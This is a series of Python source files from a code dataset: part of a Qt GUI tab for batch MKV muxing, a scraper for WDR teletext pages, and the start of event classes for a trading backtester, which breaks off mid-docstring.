GlobalSetting.MUX_SETTING_MAKE_THIS_AUDIO_DEFAULT_TRACK != \"\" or \\\n GlobalSetting.MUX_SETTING_MAKE_THIS_SUBTITLE_DEFAULT_TRACK != \"\" or \\\n GlobalSetting.VIDEO_DEFAULT_DURATION_FPS not in [\"\", \"Default\"]:\n return True\n else:\n no_setting_to_apply_dialog = InfoDialog(window_title=\"No Setting Selected\",\n info_message=\"You haven't select any \"\n \"setting to apply\")\n no_setting_to_apply_dialog.execute()\n return False\n\n\ndef check_if_all_input_videos_are_found():\n for video_file in GlobalSetting.VIDEO_FILES_ABSOLUTE_PATH_LIST:\n if not Path.is_file(Path(video_file)):\n invalid_dialog = FileNotFoundDialog(window_title=\"File Not Found\",\n error_message=\"File: \\\"\" + video_file + \"\\\" is not found\")\n invalid_dialog.execute()\n return False\n return True\n\n\ndef check_if_want_to_keep_log_file():\n if GlobalSetting.MUX_SETTING_KEEP_LOG_FILE:\n try:\n copy2(GlobalFiles.MuxingLogFilePath, GlobalSetting.DESTINATION_FOLDER_PATH)\n except Exception as e:\n write_to_log_file(e)\n error_dialog = ErrorMuxingDialog(window_title=\"Permission Denied\",\n info_message=\"Can't save log file, MKV Muxing Batch GUI lacks write \"\n \"permissions on Destination folder\")\n error_dialog.execute()\n\n\nclass MuxSettingTab(QWidget):\n tab_clicked_signal = Signal()\n start_muxing_signal = Signal()\n update_task_bar_progress_signal = Signal(int)\n update_task_bar_paused_signal = Signal()\n update_task_bar_clear_signal = Signal()\n\n def __init__(self):\n super().__init__()\n self.create_widgets()\n self.setup_widgets()\n self.connect_signals()\n\n def connect_signals(self):\n self.tab_clicked_signal.connect(self.tab_clicked)\n\n self.destination_path_button.clicked.connect(self.open_select_destination_folder_dialog)\n\n self.only_keep_those_audios_checkBox.stateChanged.connect(\n self.only_keep_those_audios_multi_choose_comboBox.check_box_state_changed)\n\n self.only_keep_those_subtitles_checkBox.stateChanged.connect(\n self.only_keep_those_subtitles_multi_choose_comboBox.check_box_state_changed)\n\n self.make_this_audio_default_checkBox.disable_combo_box.connect(self.disable_make_this_audio_default_comboBox)\n\n self.make_this_subtitle_default_checkBox.disable_combo_box.connect(\n self.disable_make_this_subtitle_default_comboBox)\n\n self.control_queue_button.add_to_queue_clicked_signal.connect(self.add_to_queue_button_clicked)\n self.control_queue_button.start_multiplexing_clicked_signal.connect(self.start_multiplexing_button_clicked)\n 
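        # the queue-control button is stateful: the same widget emits add-to-queue,\n        # start, or pause signals depending on the state it is currently in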
self.control_queue_button.pause_multiplexing_clicked_signal.connect(self.pause_multiplexing_button_clicked)\n\n self.clear_job_queue_button.clicked.connect(self.clear_job_queue_button_clicked)\n\n self.only_keep_those_audios_multi_choose_comboBox.closeList.connect(self.only_keep_those_audios_close_list)\n self.only_keep_those_audios_multi_choose_comboBox.audio_tracks_changed_signal.connect(\n self.make_this_audio_default_comboBox.addItems)\n self.only_keep_those_subtitles_multi_choose_comboBox.subtitle_tracks_changed_signal.connect(\n self.make_this_subtitle_default_comboBox.addItems)\n\n self.only_keep_those_subtitles_multi_choose_comboBox.closeList.connect(\n self.only_keep_those_subtitles_close_list)\n\n self.make_this_audio_default_comboBox.currentTextChanged.connect(\n self.make_this_audio_default_comboBox_text_changed)\n\n self.make_this_subtitle_default_comboBox.currentTextChanged.connect(\n self.make_this_subtitle_default_comboBox_text_changed)\n\n self.abort_on_errors_checkBox.stateChanged.connect(self.abort_on_errors_state_changed)\n self.add_crc_checksum_checkBox.stateChanged.connect(self.add_crc_checksum_state_changed)\n self.remove_old_crc_checksum_checkBox.stateChanged.connect(self.remove_old_crc_checksum_state_changed)\n\n self.keep_log_file_checkBox.stateChanged.connect(self.keep_log_file_state_changed)\n self.job_queue_layout.update_task_bar_progress_signal.connect(self.update_task_bar_progress)\n self.job_queue_layout.paused_done_signal.connect(self.paused_done)\n self.job_queue_layout.cancel_done_signal.connect(self.cancel_done)\n self.job_queue_layout.finished_all_jobs_signal.connect(self.finished_all_jobs)\n self.job_queue_layout.pause_from_error_occurred_signal.connect(self.pause_multiplexing_button_clicked)\n\n def setup_widgets(self):\n self.setup_mux_setting_groupBox()\n self.setup_job_queue_groupBox()\n self.setup_destination_path_label()\n self.setup_destination_path_lineEdit()\n self.setup_destination_path_button()\n self.setup_abort_on_errors_checkBox()\n self.setup_discard_old_attachments_checkBox()\n self.setup_keep_log_file_checkBox()\n self.setup_add_crc_checksum_checkBox()\n self.setup_remove_old_crc_checkBox()\n self.setup_clear_job_queue_button()\n self.setup_tool_tip_hint()\n self.setup_layouts()\n\n def setup_layouts(self):\n self.setup_MainLayout()\n self.mux_setting_groupBox.setLayout(self.mux_setting_layout)\n self.job_queue_groupBox.setLayout(self.job_queue_layout)\n self.setup_mux_tools_layout_first_row()\n self.setup_mux_tools_layout_second_row()\n self.setup_mux_setting_layout()\n self.setLayout(self.MainLayout)\n\n # noinspection PyAttributeOutsideInit\n def create_widgets(self):\n self.MainLayout = QVBoxLayout()\n self.mux_setting_groupBox = QGroupBox(self)\n self.job_queue_groupBox = QGroupBox(self)\n self.mux_setting_layout = QGridLayout()\n self.job_queue_layout = JobQueueLayout()\n self.destination_path_label = QLabel()\n self.destination_path_lineEdit = QLineEdit()\n self.destination_path_button = QPushButton()\n self.only_keep_those_audios_checkBox = OnlyKeepThoseAudiosCheckBox()\n self.only_keep_those_subtitles_checkBox = OnlyKeepThoseSubtitlesCheckBox()\n self.only_keep_those_audios_multi_choose_comboBox = AudioTracksCheckableComboBox()\n self.only_keep_those_subtitles_multi_choose_comboBox = SubtitleTracksCheckableComboBox()\n self.make_this_audio_default_checkBox = MakeThisAudioDefaultCheckBox()\n self.make_this_subtitle_default_checkBox = MakeThisSubtitleDefaultCheckBox()\n self.make_this_audio_default_comboBox = 
MakeThisTrackDefaultComboBox()\n self.make_this_subtitle_default_comboBox = MakeThisTrackDefaultComboBox()\n self.abort_on_errors_checkBox = QCheckBox()\n self.discard_old_attachments_checkBox = QCheckBox()\n self.keep_log_file_checkBox = QCheckBox()\n self.add_crc_checksum_checkBox = QCheckBox()\n self.remove_old_crc_checksum_checkBox = QCheckBox()\n self.control_queue_button = ControlQueueButton()\n self.clear_job_queue_button = QPushButton()\n self.mux_tools_layout_first_row = QHBoxLayout()\n self.mux_tools_layout_second_row = QHBoxLayout()\n self.job_queue_tools_layout = QHBoxLayout()\n\n def setup_mux_setting_layout(self):\n self.mux_setting_layout.addWidget(self.destination_path_label, 0, 0)\n self.mux_setting_layout.addWidget(self.destination_path_lineEdit, 0, 1)\n self.mux_setting_layout.addWidget(self.destination_path_button, 0, 2)\n self.mux_setting_layout.addWidget(self.only_keep_those_audios_checkBox, 1, 0)\n self.mux_setting_layout.addWidget(self.only_keep_those_subtitles_checkBox, 2, 0)\n self.mux_setting_layout.addLayout(self.mux_tools_layout_first_row, 1, 1)\n self.mux_setting_layout.addLayout(self.mux_tools_layout_second_row, 2, 1)\n\n def setup_mux_tools_layout_first_row(self):\n self.mux_tools_layout_first_row.addWidget(self.only_keep_those_audios_multi_choose_comboBox, 2)\n self.mux_tools_layout_first_row.addWidget(self.make_this_audio_default_checkBox, 1)\n self.mux_tools_layout_first_row.addWidget(self.make_this_audio_default_comboBox, 2)\n self.mux_tools_layout_first_row.addWidget(self.add_crc_checksum_checkBox)\n self.mux_tools_layout_first_row.addWidget(self.abort_on_errors_checkBox, 1)\n self.mux_tools_layout_first_row.addWidget(self.clear_job_queue_button, stretch=0)\n\n def setup_mux_tools_layout_second_row(self):\n self.mux_tools_layout_second_row.addWidget(self.only_keep_those_subtitles_multi_choose_comboBox, 2)\n self.mux_tools_layout_second_row.addWidget(self.make_this_subtitle_default_checkBox, 1)\n self.mux_tools_layout_second_row.addWidget(self.make_this_subtitle_default_comboBox, 2)\n self.mux_tools_layout_second_row.addWidget(self.remove_old_crc_checksum_checkBox, 1)\n self.mux_tools_layout_second_row.addWidget(self.keep_log_file_checkBox)\n self.mux_tools_layout_second_row.addWidget(self.control_queue_button)\n\n def setup_clear_job_queue_button(self):\n self.clear_job_queue_button.setText(\"Clear All\")\n self.clear_job_queue_button.setIcon(GlobalFiles.CleanIcon)\n self.clear_job_queue_button.setDisabled(True)\n\n def setup_add_crc_checksum_checkBox(self):\n self.add_crc_checksum_checkBox.setText(\"Add CRC checksum\")\n self.add_crc_checksum_checkBox.setToolTip(\"Add CRC checksum to the end of output file's name\")\n\n def setup_remove_old_crc_checkBox(self):\n self.remove_old_crc_checksum_checkBox.setText(\"Remove Old CRC \")\n self.remove_old_crc_checksum_checkBox.setToolTip(\n \"Remove Old CRC from the end of the file (will do nothing if there is \"\n \"none)\")\n\n def setup_keep_log_file_checkBox(self):\n self.keep_log_file_checkBox.setText(\"Keep Log File\")\n self.keep_log_file_checkBox.setToolTip(\"log file will located in the source folder after finished muxing\")\n\n def setup_discard_old_attachments_checkBox(self):\n self.discard_old_attachments_checkBox.setText(\"Discard Old Attachments \")\n\n def setup_abort_on_errors_checkBox(self):\n self.abort_on_errors_checkBox.setText(\"Abort On Errors\")\n self.abort_on_errors_checkBox.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Preferred)\n\n def setup_destination_path_button(self):\n 
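        # the button itself only carries the folder-picker icon; its click handler is wired up in connect_signals()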
self.destination_path_button.setIcon(GlobalFiles.SelectFolderIcon)\n\n def setup_destination_path_lineEdit(self):\n self.destination_path_lineEdit.setPlaceholderText(\"Enter Destination Folder Path\")\n self.destination_path_lineEdit.setClearButtonEnabled(True)\n\n def setup_destination_path_label(self):\n self.destination_path_label.setText(\"Videos Destination Folder :\")\n\n def setup_MainLayout(self):\n self.MainLayout.addWidget(self.mux_setting_groupBox)\n self.MainLayout.addWidget(self.job_queue_groupBox)\n\n def setup_job_queue_groupBox(self):\n self.job_queue_groupBox.setTitle(\"Job Queue\")\n\n def setup_mux_setting_groupBox(self):\n self.mux_setting_groupBox.setTitle(\"Mux Setting\")\n\n def paintEvent(self, event: QPaintEvent):\n self.update_widgets_size()\n super().paintEvent(event)\n\n def resizeEvent(self, event: QResizeEvent):\n self.job_queue_layout.update_layout()\n super().resizeEvent(event)\n\n def update_widgets_size(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.resize(\n self.only_keep_those_audios_multi_choose_comboBox.width(),\n self.only_keep_those_audios_multi_choose_comboBox.height(),\n )\n\n self.make_this_subtitle_default_checkBox.resize(\n self.make_this_audio_default_checkBox.width(),\n self.make_this_audio_default_checkBox.height(),\n )\n self.make_this_subtitle_default_checkBox.move(\n self.make_this_audio_default_checkBox.x(),\n self.make_this_subtitle_default_checkBox.y(),\n )\n\n self.make_this_subtitle_default_comboBox.resize(\n self.make_this_audio_default_comboBox.width(),\n self.make_this_audio_default_comboBox.height(),\n )\n self.make_this_subtitle_default_comboBox.move(\n self.make_this_audio_default_comboBox.x(),\n self.make_this_subtitle_default_comboBox.y(),\n )\n\n self.remove_old_crc_checksum_checkBox.move(\n self.add_crc_checksum_checkBox.x(),\n self.add_crc_checksum_checkBox.y() + self.add_crc_checksum_checkBox.height() + 9,\n )\n self.keep_log_file_checkBox.move(\n self.abort_on_errors_checkBox.x(),\n self.abort_on_errors_checkBox.y() + self.abort_on_errors_checkBox.height() + 8,\n )\n self.control_queue_button.move(\n self.clear_job_queue_button.x(),\n self.clear_job_queue_button.y() + self.clear_job_queue_button.height() + 5,\n )\n\n self.clear_job_queue_button.resize(\n self.control_queue_button.width(),\n self.control_queue_button.height(),\n )\n self.clear_job_queue_button.setFixedWidth(self.control_queue_button.width())\n\n def open_select_destination_folder_dialog(self):\n temp_folder_path = QFileDialog.getExistingDirectory(self, caption=\"Choose Destination Folder\",\n dir=GlobalSetting.LAST_DIRECTORY_PATH, )\n if temp_folder_path == \"\" or temp_folder_path.isspace():\n return\n elif Path(temp_folder_path) in GlobalSetting.VIDEO_SOURCE_PATHS:\n invalid_dialog = InvalidPathDialog(\n error_message=\"Some Source and destination videos are in the same folder\")\n invalid_dialog.execute()\n return\n else:\n self.destination_path_lineEdit.setText(str(Path(temp_folder_path)))\n GlobalSetting.LAST_DIRECTORY_PATH = self.destination_path_lineEdit.text()\n GlobalSetting.DESTINATION_FOLDER_PATH = self.destination_path_lineEdit.text()\n\n def check_destination_path(self):\n temp_destination_path = self.destination_path_lineEdit.text()\n try:\n if temp_destination_path == \"\" or temp_destination_path.isspace():\n temp_destination_path = \"[Empty Path]\"\n raise Exception(\n \"[WinError 998] Empty path is Not a valid path : \" + temp_destination_path)\n # check if system is windows so path must have # SOME_LETTER:\\\n if os.name 
== 'nt':\n if temp_destination_path[1:3] != \":\\\\\" and self.destination_path_lineEdit.text()[\n 1:3] != \":/\":\n raise Exception(\"[WinError 999] Not a valid path : \" + temp_destination_path)\n makedirs(temp_destination_path, exist_ok=True)\n ## test if i can write into this path:\n test_file_name = str(time.time()) + \".txt\"\n test_file_name_absolute = os.path.join(Path(temp_destination_path), Path(test_file_name))\n try:\n with open(test_file_name_absolute, 'w+') as test_file:\n test_file.write(\"Test\")\n os.remove(test_file_name_absolute)\n except Exception as e:\n write_to_log_file(e)\n invalid_dialog = InvalidPathDialog(window_title=\"Permission Denied\",\n error_message=\"MKV Muxing Batch GUI lacks write \"\n \"permissions on Destination folder\")\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n except Exception as e:\n write_to_log_file(e)\n error_message = \"\"\n if temp_destination_path == \"[Empty Path]\":\n error_message = \"Enter a valid destination path\"\n else:\n error_message = temp_destination_path + \"\\nisn't a valid path!\"\n invalid_dialog = InvalidPathDialog(error_message=error_message)\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n if Path(temp_destination_path) in GlobalSetting.VIDEO_SOURCE_PATHS:\n invalid_dialog = InvalidPathDialog(\n error_message=\"Some Source and destination videos are in the same folder\")\n invalid_dialog.execute()\n self.destination_path_lineEdit.setText(GlobalSetting.DESTINATION_FOLDER_PATH)\n return False\n GlobalSetting.DESTINATION_FOLDER_PATH = temp_destination_path\n return True\n\n def setup_tool_tip_hint(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.set_tool_tip_hint()\n self.only_keep_those_audios_multi_choose_comboBox.set_tool_tip_hint()\n self.make_this_subtitle_default_checkBox.set_tool_tip_hint_no_check()\n self.make_this_audio_default_checkBox.set_tool_tip_hint_no_check()\n\n def add_to_queue_button_clicked(self):\n self.job_queue_layout.setup_queue()\n self.enable_muxing_setting()\n if not GlobalSetting.JOB_QUEUE_EMPTY:\n self.disable_editable_widgets()\n self.control_queue_button.set_state_start_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n change_global_LogFilePath()\n else:\n self.enable_editable_widgets()\n self.setup_enable_options_for_mkv_only_options()\n\n def tab_clicked(self):\n self.job_queue_layout.show_necessary_table_columns()\n self.setup_enable_options_for_mkv_only_options()\n self.setup_tracks_to_be_chosen_mkv_only_options()\n\n def setup_tracks_to_be_chosen_mkv_only_options(self):\n self.only_keep_those_subtitles_multi_choose_comboBox.refresh_tracks()\n self.only_keep_those_audios_multi_choose_comboBox.refresh_tracks()\n\n def setup_enable_options_for_mkv_only_options(self):\n if GlobalSetting.JOB_QUEUE_EMPTY:\n if GlobalSetting.VIDEO_SOURCE_MKV_ONLY:\n self.only_keep_those_audios_checkBox.setEnabled(True)\n self.only_keep_those_subtitles_checkBox.setEnabled(True)\n self.make_this_audio_default_checkBox.setEnabled(True)\n self.make_this_subtitle_default_checkBox.setEnabled(True)\n self.only_keep_those_audios_checkBox.setToolTip(\"\")\n self.only_keep_those_subtitles_checkBox.setToolTip(\"\")\n self.make_this_audio_default_comboBox.setToolTip(\"\")\n self.make_this_subtitle_default_comboBox.setToolTip(\"\")\n self.setup_tool_tip_hint()\n else:\n\n self.only_keep_those_subtitles_checkBox.setCheckState(Qt.Unchecked)\n 
self.only_keep_those_audios_checkBox.setCheckState(Qt.Unchecked)\n self.make_this_audio_default_checkBox.setCheckState(Qt.Unchecked)\n self.make_this_subtitle_default_checkBox.setCheckState(Qt.Unchecked)\n\n self.only_keep_those_audios_checkBox.setEnabled(False)\n self.only_keep_those_subtitles_checkBox.setEnabled(False)\n self.make_this_audio_default_checkBox.setEnabled(False)\n self.make_this_subtitle_default_checkBox.setEnabled(False)\n self.only_keep_those_audios_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_subtitles_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n self.make_this_audio_default_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n self.make_this_subtitle_default_checkBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.make_this_audio_default_comboBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.make_this_subtitle_default_comboBox.setToolTip(\"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_audios_multi_choose_comboBox.setToolTip(\n \"[Disabled] Only works when video files \"\n \"are Mkv only\")\n self.only_keep_those_subtitles_multi_choose_comboBox.setToolTip(\n \"[Disabled] Only works when video files \"\n \"are Mkv only\")\n\n def clear_job_queue_button_clicked(self):\n self.job_queue_layout.clear_queue()\n self.control_queue_button.set_state_add_to_queue()\n self.clear_job_queue_button.setDisabled(True)\n self.control_queue_button.setDisabled(False)\n self.enable_editable_widgets()\n self.enable_muxing_setting()\n self.setup_enable_options_for_mkv_only_options()\n self.update_task_bar_clear_signal.emit()\n\n def disable_editable_widgets(self):\n self.only_keep_those_subtitles_checkBox.setEnabled(False)\n self.only_keep_those_subtitles_multi_choose_comboBox.setEnabled(False)\n self.only_keep_those_audios_checkBox.setEnabled(False)\n self.only_keep_those_audios_multi_choose_comboBox.setEnabled(False)\n self.make_this_subtitle_default_checkBox.setEnabled(False)\n self.make_this_subtitle_default_comboBox.setEnabled(False)\n self.make_this_audio_default_checkBox.setEnabled(False)\n self.make_this_audio_default_comboBox.setEnabled(False)\n self.add_crc_checksum_checkBox.setEnabled(False)\n self.remove_old_crc_checksum_checkBox.setEnabled(False)\n\n def enable_editable_widgets(self):\n self.only_keep_those_subtitles_checkBox.setEnabled(True)\n self.only_keep_those_subtitles_multi_choose_comboBox.setEnabled(\n self.only_keep_those_subtitles_checkBox.isChecked())\n self.only_keep_those_audios_checkBox.setEnabled(True)\n self.only_keep_those_audios_multi_choose_comboBox.setEnabled(self.only_keep_those_audios_checkBox.isChecked())\n self.make_this_subtitle_default_checkBox.setEnabled(True)\n self.make_this_subtitle_default_comboBox.setEnabled(self.make_this_subtitle_default_checkBox.isChecked())\n self.make_this_audio_default_checkBox.setEnabled(True)\n self.make_this_audio_default_comboBox.setEnabled(self.make_this_audio_default_checkBox.isChecked())\n self.add_crc_checksum_checkBox.setEnabled(True)\n self.remove_old_crc_checksum_checkBox.setEnabled(True)\n\n def only_keep_those_audios_close_list(self):\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_LANGUAGES = self.only_keep_those_audios_multi_choose_comboBox.tracks_language\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_IDS = 
self.only_keep_those_audios_multi_choose_comboBox.tracks_id\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_AUDIOS_TRACKS_NAMES = self.only_keep_those_audios_multi_choose_comboBox.tracks_name\n\n def only_keep_those_subtitles_close_list(self):\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_LANGUAGES = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_language\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_IDS = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_id\n GlobalSetting.MUX_SETTING_ONLY_KEEP_THOSE_SUBTITLES_TRACKS_NAMES = self.only_keep_those_subtitles_multi_choose_comboBox.tracks_name\n\n def disable_make_this_subtitle_default_comboBox(self, state):\n self.make_this_subtitle_default_comboBox.setDisabled(state)\n if state:\n self.make_this_subtitle_default_comboBox.setCurrentIndex(-1)\n\n def disable_make_this_audio_default_comboBox(self, state):\n self.make_this_audio_default_comboBox.setDisabled(state)\n if state:\n self.make_this_audio_default_comboBox.setCurrentIndex(-1)\n\n def make_this_audio_default_comboBox_text_changed(self):\n GlobalSetting.MUX_SETTING_MAKE_THIS_AUDIO_DEFAULT_TRACK = str(\n self.make_this_audio_default_comboBox.current_text)\n\n def make_this_subtitle_default_comboBox_text_changed(self):\n GlobalSetting.MUX_SETTING_MAKE_THIS_SUBTITLE_DEFAULT_TRACK = str(\n self.make_this_subtitle_default_comboBox.current_text)\n\n def update_task_bar_progress(self, new_progress):\n self.update_task_bar_progress_signal.emit(new_progress)\n\n def enable_muxing_setting(self):\n self.destination_path_lineEdit.setEnabled(True)\n self.destination_path_button.setEnabled(True)\n self.abort_on_errors_checkBox.setEnabled(True)\n self.keep_log_file_checkBox.setEnabled(True)\n\n def disable_muxing_setting(self):\n self.destination_path_lineEdit.setEnabled(False)\n self.destination_path_button.setEnabled(False)\n self.abort_on_errors_checkBox.setEnabled(False)\n self.keep_log_file_checkBox.setEnabled(False)\n\n @staticmethod\n def abort_on_errors_state_changed(state):\n GlobalSetting.MUX_SETTING_ABORT_ON_ERRORS = bool(state)\n\n def add_crc_checksum_state_changed(self, state):\n if state:\n GlobalSetting.MUX_SETTING_ADD_CRC = True\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = True\n self.remove_old_crc_checksum_checkBox.setChecked(True)\n else:\n GlobalSetting.MUX_SETTING_ADD_CRC = False\n\n def remove_old_crc_checksum_state_changed(self, state):\n if state:\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = True\n else:\n GlobalSetting.MUX_SETTING_ADD_CRC = False\n GlobalSetting.MUX_SETTING_REMOVE_OLD_CRC = False\n self.add_crc_checksum_checkBox.setChecked(False)\n\n @staticmethod\n def keep_log_file_state_changed(state):\n GlobalSetting.MUX_SETTING_KEEP_LOG_FILE = bool(state)\n\n def start_multiplexing_button_clicked(self):\n at_least_one_muxing_setting_has_been_selected = check_if_at_least_one_muxing_setting_has_been_selected()\n all_input_videos_are_found = check_if_all_input_videos_are_found()\n if at_least_one_muxing_setting_has_been_selected and all_input_videos_are_found:\n destination_path_valid = self.check_destination_path()\n if destination_path_valid:\n self.setup_log_file()\n self.control_queue_button.set_state_pause_multiplexing()\n self.disable_muxing_setting()\n self.job_queue_layout.start_muxing()\n self.start_muxing_signal.emit()\n self.clear_job_queue_button.setDisabled(True)\n\n def pause_multiplexing_button_clicked(self):\n self.job_queue_layout.pause_muxing()\n self.control_queue_button.setDisabled(True)\n 
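        # keep the button disabled while the worker finishes the current file; the worker\n        # confirms the pause by emitting paused_done_signal, which re-enables it in paused_done()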
self.control_queue_button.set_state_pausing_multiplexing()\n\n def paused_done(self):\n self.control_queue_button.set_state_resume_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n self.control_queue_button.setDisabled(False)\n self.update_task_bar_paused_signal.emit()\n\n def cancel_done(self):\n self.disable_editable_widgets()\n self.enable_muxing_setting()\n self.control_queue_button.set_state_start_multiplexing()\n self.clear_job_queue_button.setDisabled(False)\n change_global_LogFilePath()\n\n def finished_all_jobs(self):\n self.enable_editable_widgets()\n self.enable_muxing_setting()\n self.setup_enable_options_for_mkv_only_options()\n self.control_queue_button.set_state_start_multiplexing()\n self.control_queue_button.setDisabled(True)\n self.clear_job_queue_button.setDisabled(False)\n self.update_task_bar_clear_signal.emit()\n GlobalSetting.JOB_QUEUE_EMPTY = True\n check_if_want_to_keep_log_file()\n\n def setup_log_file(self):\n if self.control_queue_button.state == \"START\":\n open(GlobalFiles.MuxingLogFilePath, 'w+').close()\n\n def set_default_directory(self):\n self.destination_path_lineEdit.setText(DefaultOptions.Default_Destination_Directory)\n","repo_name":"yaser01/mkv-muxing-batch-gui","sub_path":"packages/Tabs/MuxSetting/MuxSetting.py","file_name":"MuxSetting.py","file_ext":"py","file_size_in_byte":31956,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"65"} +{"seq_id":"12041122173","text":"from typing import Dict, Generator, Tuple, Union, Optional, Any\n\nimport bs4\n\nfrom ..scraper import Scraper\nfrom ..teletext import Teletext, TeletextPage\n\n\nclass WDR(Scraper):\n\n NAME = \"wdr\"\n\n PAGE_CATEGORIES = {\n 100: \"index\",\n 101: \"news\",\n 180: \"weather\",\n 200: \"sport\",\n 300: \"program\",\n 500: \"service\",\n 550: \"lotto\",\n 555: \"traffic\",\n 570: \"service\",\n 600: \"sport\",\n 681: \"traffic\",\n 700: \"internal\",\n 800: \"extra\",\n }\n\n COLOR_CLASS_MAPPING = {\n \"black\": \"b\",\n \"red\": \"r\",\n \"green\": \"g\",\n \"yellow\": \"y\",\n \"blue\": \"l\",\n \"magenta\": \"m\",\n \"cyan\": \"c\",\n \"white\": \"w\",\n }\n\n def iter_pages(self) -> Generator[Tuple[int, int, bs4.Tag], None, None]:\n soup = self.get_soup(\"https://www1.wdr.de/wdrtext/index.html\")\n\n for sub_index, content in self._iter_sub_pages(soup.find(\"div\", {\"id\": \"wdrtext_inner\"})):\n yield 100, sub_index, content\n\n # get the link with the current session-id or whatever that is\n generic_href = self._get_href(soup)\n assert generic_href, f\"special wdr page link not found\"\n\n for page_index in range(101, 900):\n url = self._replace_page_num(generic_href, page_index)\n soup = self.get_soup(url)\n if soup:\n page_input = soup.find(\"input\", {\"name\": \"_page_num\"})\n if page_input and page_input[\"value\"] != str(page_index):\n continue\n\n for sub_index, content in self._iter_sub_pages(soup.find(\"div\", {\"id\": \"wdrtext_inner\"})):\n yield page_index, sub_index, content\n\n def _iter_sub_pages(self, div: bs4.Tag) -> Generator[Tuple[int, bs4.Tag], None, None]:\n for sub_index in range(1, 100):\n sub_page = div.find(\"div\", {\"id\": f\"seite_{sub_index}\"})\n if not sub_page:\n break\n\n yield sub_index, sub_page\n\n def _get_href(self, soup: bs4.BeautifulSoup) -> Optional[str]:\n for a in soup.find_all(\"a\"):\n href = a.get(\"href\")\n if href and href.startswith(\"/wdrtext/externvtx100~_eam-\") and \"__page__num-\" in href:\n return \"https://www1.wdr.de\" + href\n\n def _replace_page_num(self, 
href: str, num: int) -> str:\n idx = href.index(\"__page__num-\")\n return href[:idx+12] + str(num) + href[idx+15:]\n\n def to_teletext(self, content: bs4.Tag) -> TeletextPage:\n tt = TeletextPage()\n for row in content.find(\"div\", {\"class\": \"vt_table\"}).find_all(\"div\", {\"class\": \"vt_row\"}):\n if row.find(\"div\", {\"class\": \"vt_row\"}):\n # assume that unclosed row divs are empty\n # (probably bad practice in template rendering)\n continue\n tt.new_line()\n for elem in row.children:\n if elem.name != \"div\":\n continue\n\n for span in elem.find_all(\"span\"):\n if \"invisible\" in (span.get(\"class\") or []):\n span.clear()\n\n block = TeletextPage.Block(\"\")\n\n classes = elem[\"class\"]\n num_cols = None\n for cls in classes:\n if cls in self.COLOR_CLASS_MAPPING:\n block.color = self.COLOR_CLASS_MAPPING[cls]\n elif cls[3:] in self.COLOR_CLASS_MAPPING:\n block.bg_color = self.COLOR_CLASS_MAPPING[cls[3:]]\n elif cls.startswith(\"col\"):\n num_cols = int(cls[3:])\n\n block.text = elem.find(\"span\").text.replace(\"\\n\", \"\")\n a = elem.find(\"a\")\n if a:\n block.text = a.text\n try:\n link = int(a[\"href\"].split(\"?\", 1)[0][-8:-5])\n block.link = link\n except (ValueError, KeyError) as e:\n self.log(f\"unhandled link address '{a['href']}'\")\n\n if num_cols:\n block.text = block.text[:num_cols]\n\n if block.text:\n tt.add_block(block)\n\n return tt\n\n @classmethod\n def legacy_bytes_to_content(cls, content: bytes) -> Any:\n return cls.to_soup(content.decode(\"utf-8\"))\n","repo_name":"defgsus/teletext-archive-unicode","sub_path":"src/sources/wdr.py","file_name":"wdr.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"5866423685","text":"#-*- coding: UTF-8 -*-\n\nclass Event(object):\n \"\"\"\n \"\"\"\n pass\n\n\nclass MarketEvent(Event):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialises the MarketEvent.\n \"\"\"\n self.type = 'MARKET'\n\n\nclass SignalEvent(Event):\n \"\"\"\n \"\"\"\n \n def __init__(self, strategy_id, symbol, datetime, signal_type, strength):\n \"\"\"\n Initialises the SignalEvent.\n\n Parameters:\n strategy_id - The unique ID of the strategy sending the signal.\n symbol - The ticker symbol, e.g. 'GOOG'.\n datetime - The timestamp at which the signal was generated.\n signal_type - 'LONG' or 'SHORT'.\n strength - An adjustment factor \"suggestion\" used to scale \n quantity at the portfolio level. Useful for pairs strategies.\n \"\"\"\n self.strategy_id = strategy_id\n self.type = 'SIGNAL'\n self.symbol = symbol\n self.datetime = datetime\n self.signal_type = signal_type\n self.strength = strength\n\n\nclass OrderEvent(Event):\n \"\"\"\n \"\"\"\n\n def __init__(self, symbol, order_type, quantity, direction):\n \"\"\"\n Initialises the order type, setting whether it is\n a Market order ('MKT') or Limit order ('LMT'), has\n a quantity (integral) and its direction ('BUY' or\n 'SELL').\n\n TODO: Must handle error checking here to obtain \n rational orders (i.e. 
